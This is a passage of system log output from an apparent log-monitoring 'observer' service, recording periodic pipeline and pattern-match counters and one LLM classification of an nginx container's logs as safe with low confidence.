regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:49:01.941516 [observer] Pipeline: processed=216 pattern_hits=212 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:49:01.941547 [observer] Patterns: hash=212 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:49:31.933414 [observer] Pipeline: processed=218 pattern_hits=214 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:49:31.933437 [observer] Patterns: hash=214 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:50:01.949915 [observer] Pipeline: processed=222 pattern_hits=218 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:50:01.949944 [observer] Patterns: hash=218 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:50:31.945796 [observer] Pipeline: processed=224 pattern_hits=220 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:50:31.945826 [observer] Patterns: hash=220 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:51:01.935091 [observer] Pipeline: processed=228 pattern_hits=224 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:51:01.935120 [observer] Patterns: hash=224 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:51:31.934598 [observer] Pipeline: processed=230 pattern_hits=226 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:51:31.934628 [observer] 
Patterns: hash=226 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:52:01.956835 [observer] Pipeline: processed=232 pattern_hits=228 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:52:01.956863 [observer] Patterns: hash=228 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:52:31.934505 [observer] Pipeline: processed=236 pattern_hits=232 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:52:31.934537 [observer] Patterns: hash=232 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:53:01.959936 [observer] Pipeline: processed=240 pattern_hits=236 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:53:01.959971 [observer] Patterns: hash=236 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:53:31.934887 [observer] Pipeline: processed=244 pattern_hits=240 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:53:31.934912 [observer] Patterns: hash=240 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:54:01.950253 [observer] Pipeline: processed=246 pattern_hits=242 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:54:01.950282 [observer] Patterns: hash=242 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:54:31.933592 [observer] Pipeline: processed=250 pattern_hits=246 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:54:31 ip-172-26-12-110 observer[1565011]: 
2026/03/20 00:54:31.933616 [observer] Patterns: hash=246 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:55:01.950496 [observer] Pipeline: processed=252 pattern_hits=248 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:55:01.950520 [observer] Patterns: hash=248 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:55:31.944062 [observer] Pipeline: processed=254 pattern_hits=250 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:55:31.944090 [observer] Patterns: hash=250 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:56:01.962246 [observer] Pipeline: processed=258 pattern_hits=254 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:56:01.962269 [observer] Patterns: hash=254 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:56:31.933491 [observer] Pipeline: processed=260 pattern_hits=256 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:56:31.933513 [observer] Patterns: hash=256 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:57:01.939623 [observer] Pipeline: processed=264 pattern_hits=260 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:57:01.939654 [observer] Patterns: hash=260 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:57:31.944491 [observer] Pipeline: processed=266 pattern_hits=262 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:57:31 
ip-172-26-12-110 observer[1565011]: 2026/03/20 00:57:31.944515 [observer] Patterns: hash=262 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:58:01.939975 [observer] Pipeline: processed=272 pattern_hits=268 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:58:01.940004 [observer] Patterns: hash=268 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:58:31.942747 [observer] Pipeline: processed=274 pattern_hits=270 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:58:31.942777 [observer] Patterns: hash=270 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:59:01.981806 [observer] Pipeline: processed=276 pattern_hits=272 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:59:01.982751 [observer] Patterns: hash=272 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 00:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:59:31.934388 [observer] Pipeline: processed=280 pattern_hits=276 llm_calls=4 llm_errors=0 learned=0 Mar 20 00:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:59:31.934413 [observer] Patterns: hash=276 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:00:01.937053 [observer] Pipeline: processed=282 pattern_hits=278 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:00:01.937080 [observer] Patterns: hash=278 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:00:31.934561 [observer] Pipeline: processed=286 pattern_hits=282 llm_calls=4 
llm_errors=0 learned=0 Mar 20 01:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:00:31.934585 [observer] Patterns: hash=282 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:01:01.950111 [observer] Pipeline: processed=288 pattern_hits=284 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:01:01.950142 [observer] Patterns: hash=284 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:01:31.933909 [observer] Pipeline: processed=292 pattern_hits=288 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:01:31.933932 [observer] Patterns: hash=288 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:02:01.945889 [observer] Pipeline: processed=294 pattern_hits=290 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:02:01.945915 [observer] Patterns: hash=290 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:02:31.950598 [observer] Pipeline: processed=296 pattern_hits=292 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:02:31.950624 [observer] Patterns: hash=292 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:03:01.938483 [observer] Pipeline: processed=300 pattern_hits=296 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:03:01.938510 [observer] Patterns: hash=296 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:03:31.946009 [observer] Pipeline: processed=304 
pattern_hits=300 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:03:31.946034 [observer] Patterns: hash=300 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:04:01.962217 [observer] Pipeline: processed=308 pattern_hits=304 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:04:01.962327 [observer] Patterns: hash=304 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:04:31.940615 [observer] Pipeline: processed=310 pattern_hits=306 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:04:31.940639 [observer] Patterns: hash=306 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:05:01.989071 [observer] Pipeline: processed=314 pattern_hits=310 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:05:01.989108 [observer] Patterns: hash=310 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:05:31.941516 [observer] Pipeline: processed=316 pattern_hits=312 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:05:31.941538 [observer] Patterns: hash=312 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:06:01.951816 [observer] Pipeline: processed=318 pattern_hits=314 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:06:01.951841 [observer] Patterns: hash=314 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:06:31.937808 
[observer] Pipeline: processed=322 pattern_hits=318 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:06:31.937834 [observer] Patterns: hash=318 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:07:01.950707 [observer] Pipeline: processed=324 pattern_hits=320 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:07:01.950739 [observer] Patterns: hash=320 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:07:31.933464 [observer] Pipeline: processed=328 pattern_hits=324 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:07:31.933495 [observer] Patterns: hash=324 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:08:01.966647 [observer] Pipeline: processed=330 pattern_hits=326 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:08:01.966676 [observer] Patterns: hash=326 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:08:31.934890 [observer] Pipeline: processed=336 pattern_hits=332 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:08:31.934919 [observer] Patterns: hash=332 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:09:01.954759 [observer] Pipeline: processed=338 pattern_hits=334 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:09:01.954794 [observer] Patterns: hash=334 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:09:31 ip-172-26-12-110 
observer[1565011]: 2026/03/20 01:09:31.941930 [observer] Pipeline: processed=340 pattern_hits=336 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:09:31.942656 [observer] Patterns: hash=336 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:10:01.992731 [observer] Pipeline: processed=344 pattern_hits=340 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:10:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:10:01.992772 [observer] Patterns: hash=340 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:10:31.934441 [observer] Pipeline: processed=346 pattern_hits=342 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:10:31.934466 [observer] Patterns: hash=342 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:11:01.938016 [observer] Pipeline: processed=350 pattern_hits=346 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:11:01.938042 [observer] Patterns: hash=346 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:11:31.933601 [observer] Pipeline: processed=352 pattern_hits=348 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:11:31.933625 [observer] Patterns: hash=348 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:12:01.961873 [observer] Pipeline: processed=355 pattern_hits=351 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:12:01.961914 [observer] Patterns: hash=351 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 
20 01:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:12:31.933560 [observer] Pipeline: processed=358 pattern_hits=354 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:12:31.933583 [observer] Patterns: hash=354 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:13:01.945582 [observer] Pipeline: processed=360 pattern_hits=356 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:13:01.945609 [observer] Patterns: hash=356 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:13:31.933345 [observer] Pipeline: processed=366 pattern_hits=362 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:13:31.933370 [observer] Patterns: hash=362 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:14:01.945674 [observer] Pipeline: processed=368 pattern_hits=364 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:14:01.945703 [observer] Patterns: hash=364 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:14:31.934284 [observer] Pipeline: processed=372 pattern_hits=368 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:14:31.934313 [observer] Patterns: hash=368 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:15:01.941174 [observer] Pipeline: processed=374 pattern_hits=370 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:15:01.941202 [observer] Patterns: hash=370 prefix=0 regex=0 contains=0 deny=0 
alert=0 suppress=0 misses=4 Mar 20 01:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:15:31.934451 [observer] Pipeline: processed=377 pattern_hits=373 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:15:31.934477 [observer] Patterns: hash=373 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:16:01.935883 [observer] Pipeline: processed=380 pattern_hits=376 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:16:01.935907 [observer] Patterns: hash=376 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:16:31.951889 [observer] Pipeline: processed=382 pattern_hits=378 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:16:31.951919 [observer] Patterns: hash=378 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:17:01.935107 [observer] Pipeline: processed=386 pattern_hits=382 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:17:01.935131 [observer] Patterns: hash=382 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:17:31.943030 [observer] Pipeline: processed=388 pattern_hits=384 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:17:31.943057 [observer] Patterns: hash=384 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:18:01.941789 [observer] Pipeline: processed=392 pattern_hits=388 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:18:01.941826 [observer] Patterns: hash=388 
prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:18:31.941387 [observer] Pipeline: processed=396 pattern_hits=392 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:18:31.941410 [observer] Patterns: hash=392 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:19:01.937045 [observer] Pipeline: processed=399 pattern_hits=395 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:19:01.937070 [observer] Patterns: hash=395 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:19:31.941149 [observer] Pipeline: processed=402 pattern_hits=398 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:19:31.941197 [observer] Patterns: hash=398 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:20:01.959530 [observer] Pipeline: processed=404 pattern_hits=400 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:20:01.959554 [observer] Patterns: hash=400 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:20:31.933306 [observer] Pipeline: processed=408 pattern_hits=404 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:20:31.933328 [observer] Patterns: hash=404 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:21:01.946198 [observer] Pipeline: processed=410 pattern_hits=406 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:21:01.946238 
[observer] Patterns: hash=406 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:21:31.933402 [observer] Pipeline: processed=414 pattern_hits=410 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:21:31.933430 [observer] Patterns: hash=410 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:22:01.963423 [observer] Pipeline: processed=416 pattern_hits=412 llm_calls=4 llm_errors=0 learned=0 Mar 20 01:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:22:01.963449 [observer] Patterns: hash=412 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4 Mar 20 01:22:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:22:25.060452 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.65 action=allow pattern_type=prefix Mar 20 01:22:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:22:25.060487 [analyzer] Confidence 0.65 too low for pattern learning (need 0.85+) Mar 20 01:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:22:31.933307 [observer] Pipeline: processed=420 pattern_hits=415 llm_calls=5 llm_errors=0 learned=0 Mar 20 01:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:22:31.933327 [observer] Patterns: hash=415 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5 Mar 20 01:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:23:01.958610 [observer] Pipeline: processed=423 pattern_hits=418 llm_calls=5 llm_errors=0 learned=0 Mar 20 01:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:23:01.958835 [observer] Patterns: hash=418 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5 Mar 20 01:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:23:31.935271 [observer] Pipeline: processed=427 pattern_hits=422 llm_calls=5 llm_errors=0 learned=0 Mar 20 01:23:31 
ip-172-26-12-110 observer[1565011]: 2026/03/20 01:23:31.935292 [observer] Patterns: hash=422 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5 Mar 20 01:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:24:01.953926 [observer] Pipeline: processed=431 pattern_hits=426 llm_calls=5 llm_errors=0 learned=0 Mar 20 01:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:24:01.953959 [observer] Patterns: hash=426 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5 Mar 20 01:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:24:31.941742 [observer] Pipeline: processed=433 pattern_hits=428 llm_calls=5 llm_errors=0 learned=0 Mar 20 01:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:24:31.941771 [observer] Patterns: hash=428 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5 Mar 20 01:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:25:01.939227 [observer] Pipeline: processed=437 pattern_hits=432 llm_calls=5 llm_errors=0 learned=0 Mar 20 01:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:25:01.939253 [observer] Patterns: hash=432 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5 Mar 20 01:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:25:31.934497 [observer] Pipeline: processed=439 pattern_hits=434 llm_calls=5 llm_errors=0 learned=0 Mar 20 01:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:25:31.934519 [observer] Patterns: hash=434 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5 Mar 20 01:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:26:01.980752 [observer] Pipeline: processed=442 pattern_hits=437 llm_calls=5 llm_errors=0 learned=0 Mar 20 01:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:26:01.980787 [observer] Patterns: hash=437 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5 Mar 20 01:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:26:31.933444 [observer] Pipeline: processed=445 pattern_hits=440 llm_calls=5 
